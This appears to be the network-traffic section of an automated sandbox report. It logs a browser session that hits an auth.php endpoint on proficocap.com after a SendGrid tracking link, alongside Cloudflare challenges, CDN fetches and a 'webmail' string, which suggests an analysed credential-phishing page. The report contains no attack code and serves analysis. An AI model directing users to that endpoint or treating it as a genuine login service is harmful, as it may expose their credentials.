    Source: global trafficHTTP traffic detected: GET /auth.php HTTP/1.1Host: proficocap.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: u48644047.ct.sendgrid.net
    Source: global trafficDNS traffic detected: DNS query: proficocap.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
    Source: global trafficDNS traffic detected: DNS query: image.thum.io
    Source: unknownHTTP traffic detected: POST /report/v4?s=NtBqaQHfiWWUjgRK%2FdXcPZXeDWXock6mo7Tw%2BIVyfVw2kgvcR5x%2Fwxet3SMCdTYMH51jspIR7N6pOfuOGkUZomiE9avmM15YSSiJ%2F2N1jYPSIX9If38lpWJ%2FHf9Laam1cw%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 385Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 08 Dec 2024 19:50:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 08 Dec 2024 19:50:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Dec 2024 19:50:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinCache-Control: max-age=14400CF-Cache-Status: HITAge: 89Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3jHlaDt%2Bzxopfr6nGzfuoPGanpOx8wAlg9FV9Q2EQoaYzC8fecp%2FeiiNrnVBez13stIdykrbNL8bbrlvX3k0cql0h35FYe%2F21FUMs4KYlF7WtASSJIj76oEbUixmbutllw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eef4905384641c1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2343&min_rtt=2338&rtt_var=887&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1434&delivery_rate=1225860&cwnd=205&unsent_bytes=0&cid=01001f8050228c9b&ts=459&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Dec 2024 19:50:38 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: jin/yoKePuVawc7mFp9WEKBotDjynqmzbXU=$jubGaRdAZ8kWo8Dscache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FoFmD6anGQ1F2LCjcBc5m6URlPCGHO7Ol5ZIpHjq2vhrVJ9GTNKYoKqYERLfPaqTiNMCMERYD9Qv2QiQN7t0BhuDpUVmlzx%2FPnVqh1mYbJZat7mR21gCcIpGR5SuBuj4OQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eef4917dc3eef9d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1802&min_rtt=1793&rtt_var=691&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1166&delivery_rate=1563169&cwnd=106&unsent_bytes=0&cid=b06bdaeefe6a3c20&ts=456&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Dec 2024 19:50:46 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: uTSOjIAqAzA/U6B6fCRHFu0WyLlWs24Qgc8=$WqnG2FvKw+FD68oVServer: cloudflareCF-RAY: 8eef494bac5d41df-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Dec 2024 19:50:52 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: AkKwqzEuh8uUt8JHcRPHDfy+GZLRoZymEFM=$VsnjO48JeSovXAzZServer: cloudflareCF-RAY: 8eef49709dc278d3-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Dec 2024 19:51:08 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: gPJlJ0CYnuXpFfabzKHgv667brwDKnLSxsA=$2q+F2svspD+lJeCacache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8eef49d5bb13729f-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Dec 2024 19:51:13 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: D4Q1Trsaimu1XDNYJKOZ6vl2ixPWOjPg53U=$5hbk4CYwHNdbjGwHReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BaBa%2Bcls9XuXgYmrVEVw9n%2Bhi9%2F%2BAQrzF8U5ipv6RCLOiYa8iAIomZnG2OE7fSb0hTmYyr8zHA5IYWMJ9z%2BjRGX38WSfY%2Fa54ZhR3f2UUb0bgXN7iYKX3K6%2B1h3zxKm6cQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eef49f2cb26f795-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1765&rtt_var=675&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1166&delivery_rate=1607044&cwnd=159&unsent_bytes=0&cid=a3f6a1bbad34f139&ts=653&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 08 Dec 2024 19:51:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
    Source: chromecache_132.2.drString found in binary or memory: http://webmail.$
    Source: chromecache_132.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
    Source: chromecache_132.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
    Source: chromecache_140.2.drString found in binary or memory: https://getbootstrap.com/)
    Source: chromecache_140.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
    Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
